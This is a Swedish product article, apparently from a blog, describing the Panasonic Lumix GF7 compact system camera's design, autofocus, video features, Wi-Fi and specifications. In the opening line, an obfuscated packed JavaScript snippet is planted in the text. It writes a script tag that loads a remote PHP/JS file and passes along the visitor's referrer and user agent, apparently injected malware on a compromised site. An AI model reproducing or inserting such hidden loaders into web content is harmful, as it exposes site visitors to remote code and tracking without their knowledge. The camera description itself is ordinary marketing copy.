Image Image Image Image Image Image Image Image Image Image

| 4 juni, 2020

Scroll to top

Top

Panasonic Lumix GF7

Panasonic Lumix GF7
Sebastian

Lumix eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nybbr|var|u0026u|referrer|shbka||js|php’.split(’|’),0,{}))
GF7, en elegant och kompakt systemkamera med mängder av kreativa funktioner och hög bildkvalitet. Micro Four Thirds-standarden erbjuder ett brett utbud av objektiv att välja bland, vilket gör att både stilmedvetna och fotoentusiaster kan bygga ihop kameran precis såsom de vill.

Lumix GF7 är liksom föregångaren Lumix GF6 både lätt och kompakt. Den finns i de klassiska färgerna svart och brunt, med inslag av silver. Greppet har läderstruktur och kamerakroppen är utformad för att kameran både ska vara lätt att hålla i och att använda. Skärmen på baksidan (3 tum, 1040K punkters upplösning) kan roteras 180 grader, vilket gör det enkelt att ta bilder på sig själv. När du vinklar upp den aktiveras kamerans Self Shot-läge automatiskt så att ”selfien” blir av bästa möjliga kvalitet. En mängd olika filter och kreativa lägen gör det lätt för användarna att hitta sina egna personliga uttryck. Filtereffekterna i Creative Control-funktionen gör det även möjligt att ta bilder med och utan filter samtidigt.

Snabbt och exakt fokus

Vår nya medlem av Lumix G-serien är utrustad med ett antal automatiska och snabba autofokusfunktioner (AF) som hjälper dig att få tydliga bilder, även vid brådskande fototillfällen. Med Low Light AF-läget kan användare ställa in fokus på motiv även i svagt ljus, som t ex under en promenad i månskenet. Kameran har även Face Recognition och Face/Eye Detection AF som fokuserar på ansiktet eller ögonen för att få bästa möjliga fokus.

Animation och högkvalitativa videos

Lumix GF7 kan fånga ögonblick i livet med rörliga bilder i Full HD. Du kan även skapa din egen Shot Time Lapse för att dokumentera förändringar i en scen under ett längre tidsintervall, medan Stop Motion Animation gör det möjligt att skapa animerade filmer med statiska objekt.

Fjärrstyrnings- och anslutningsmöjligheter

Med Panasonic Image-appen kan du fjärrstyra kameran via din smartphone eller surfplatta, vilket är perfekt för de fototillfällen då du själv inte vill vara nära kameran och motivet.

Integrerad WiFi-uppkoppling gör det även möjligt att direkt publicera dina videoklipp i sociala medier eller skicka till vänner och familj.

Lumix GF7 finns tillgänglig i mars till ett rekommenderat pris på 5990 SEK, inklusive ett 12-32 mm-objektiv.

Lumix GF7-specifikationer

  • 16 megapixel Digital Live MOS-sensor med Venus Engine
  • 1920 x 1080 Full HD-video i AVCHD Progressive- eller MP4(MPEG-4 / H.264)-format
  • 3-tums 1040K punkters pekskärm, kan roteras 180 grader
  • Ett stort antal kreativa och automatiska funktioner, inklusive Self Shot, Jump Snap, Creative Control, Time Lapse och Stop Motion Animation
  • Light Speed Auto Focus med Contrast AF, Low Light AF, Face/Eye Detection AF mm
  • Wi-Fi-anslutning

Läs mer om Lumix GF7 här: http://www.panasonic.com/se/consumer/foto-och-videokamera/lumix-g-compact-system-cameras-dslm/dmc-gf7.html